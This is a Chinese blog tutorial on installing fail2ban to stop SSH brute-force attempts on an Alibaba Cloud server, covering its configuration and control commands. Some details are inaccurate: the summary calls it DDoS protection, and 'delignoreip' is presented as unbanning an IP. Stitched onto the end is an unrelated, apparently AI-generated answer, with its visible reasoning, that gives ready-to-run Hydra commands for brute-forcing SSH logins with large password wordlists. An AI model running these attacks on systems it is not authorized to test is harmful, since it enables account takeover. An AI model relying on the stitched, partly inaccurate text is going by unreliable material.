阿里云服务器 Linux防止SSH爆破 fail2ban安装使用

本文介绍如何使用fail2ban工具保护阿里云服务器免受DDoS攻击,通过详细步骤指导安装、配置及启动fail2ban,有效抵御非法登录尝试,确保服务器安全。

摘要生成于 C知道 ,由 DeepSeek-R1 满血版支持, 前往体验 >

目录

1 安装fail2ban

2 配置

3启动


自己的阿里云经常被攻击迫于无奈

查看攻击状态   攻击防护

1 安装fail2ban

#安装fial2ban
yum -y install fail2ban

装成功后fail2ban配置文件位于/etc/fail2ban,其中jail.conf为主配置文件,相关的匹配规则位于filter.d目录,其它目录/文件一般很少用到。

2 配置

/etc/fail2ban

vim jail.local

[DEFAULT]
# 忽略的IP列表,不受设置限制
ignoreip = 127.0.0.1/8 

# 被封IP禁止访问的时间,单位是秒
bantime = 86400

# 检测时间,在此时间内超过规定的次数会激活fail2ban,单位是秒 
findtime = 300

# 允许错误登录的最大次数
maxretry = 3

# 日志修改检测机制(gamin、polling和auto这三种)
backend = auto 

# 定义日志级别,默认
loglevel = 3 

# 定义 fail2ban 日志文件
logtarget = /var/log/fail2ban.log 

# sock 文件存放位置,默认
socket = /var/run/fail2ban/fail2ban.sock 

# pid 文件存放位置,默认
pidfile = /var/run/fail2ban/fail2ban.pid 

# 邮件通知参数
sendmail-whois[name=SSH, dest=you@example.com, sender=fail2ban@example.com, sendername="Fail2Ban"]
# 收件人地址           ## 发件人地址 

[sshd]
# 激活
enabled = true
# 规律规则名,对应filter.d目录下的sshd.conf
filter = sshd 
banaction = firewallcmd-new
# 检测的系统的登陆日志文件。这里要写sshd服务日志文件
logpath = /var/log/secure 
# 禁止用户IP访问主机1小时
bantime = 3600 
# 在5分钟内内出现规定次数就开始工作
findtime = 300 
# 3次密码验证失败
maxretry = 3 
port = 22

[sshd-ddos]
enabled = true

3启动

#启动
systemctl start fail2ban
#重新启动
systemctl restart fail2ban
#停止
systemctl stop fail2ban
#开机启动
systemctl enable fail2ban

#查看被ban IP,其中sshd为名称,比如上面的[wordpress]
fail2ban-client status sshd

#删除被ban IP
fail2ban-client set sshd delignoreip 192.168.111.111
#查看日志
tail  /var/log/fail2ban.log
#查看被拦截的ip
fail2ban-client status sshd

 

<think>嗯,用户问的是在Kali Linux使用九头蛇(Hydra)爆破SSH的方法。首先,我需要确认Hydra的基本用法和参数。Hydra是一个强大的网络登录破解工具,支持多种协议,包括SSH。用户可能需要知道如何安装、基本命令结构以及具体的参数设置。 然后,用户可能对SSH爆破的具体步骤不太清楚,比如如何指定目标IP、用户名列表、密码字典等。需要详细说明每个参数的作用,比如-l指定单个用户名,-L指定用户名字典,-p指定端口,-P指定密码字典,-t设置线程数,以及-vV显示详细输出。 还要提醒用户注意法律和道德问题,未经授权的攻击是非法的。可能需要给出一个示例命令,帮助用户理解如何组合这些参数。比如hydra -l root -P /usr/share/wordlists/rockyou.txt ssh://192.168.1.100 -t 4 -vV。 另外,用户可能不知道如何生成或获取密码字典,可以提到Kali自带的字典位置,比如/usr/share/wordlists/,或者建议使用crunch等工具生成自定义字典。同时,需要警告他们成功率取决于字典质量,强密码可能难以破解。 最后,要强调合法使用,建议仅在授权的环境中测试,并提醒如果SSH服务器启用了公钥认证或双因素认证,密码爆破可能无效。确保回答结构清晰,分步骤说明,避免使用复杂术语,让新手也能理解。</think>以下是在 Kali Linux使用 Hydra(九头蛇)进行 SSH 爆破的详细步骤说明: ----- ### 基础准备 1. 安装 Hydra: ```bash sudo apt update && sudo apt install hydra -y ``` 2. 准备字典文件: - 用户名字典(users.txt) - 密码字典(passwords.txt) - Kali 自带字典路径:`/usr/share/wordlists/` ----- ### 爆破命令结构 ```bash hydra -l <用户名> -P <密码字典路径> <目标IP> ssh [-s <端口>] [-t <线程数>] [-vV] ``` ----- ### 参数详解 1. **单用户爆破** ```bash hydra -l admin -P passwords.txt ssh://192.168.1.100 -t 4 -vV ``` - `-l admin`:指定用户名 - `-P passwords.txt`:密码字典路径 - `-t 4`:线程数(建议不超过 16) - `-vV`:显示详细过程 2. **多用户爆破** ```bash hydra -L users.txt -P passwords.txt ssh://192.168.1.100 -s 2222 ``` - `-L`:用户名字典 - `-s 2222`:非标准SSH端口时使用 ----- ### 实战示例 ```bash hydra -L /usr/share/seclists/Usernames/top-usernames-shortlist.txt \ -P /usr/share/wordlists/rockyou.txt \ ssh://10.10.10.10 -t 16 -vV -f ``` - `-f`:找到首个有效凭证后立即停止 ----- ### 防御建议(供安全测试参考) 1. 启用 SSH 公钥认证 2. 设置失败登录锁定策略 3. 修改默认 SSH 端口 4. 使用 fail2ban 防御工具 ----- ### 法律声明 ⚠️ 该技术仅限授权渗透测试使用,未经许可攻击他人系统属于违法行为。《刑法》第285条明确规定非法侵入计算机信息系统最高可处七年有期徒刑。
评论
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值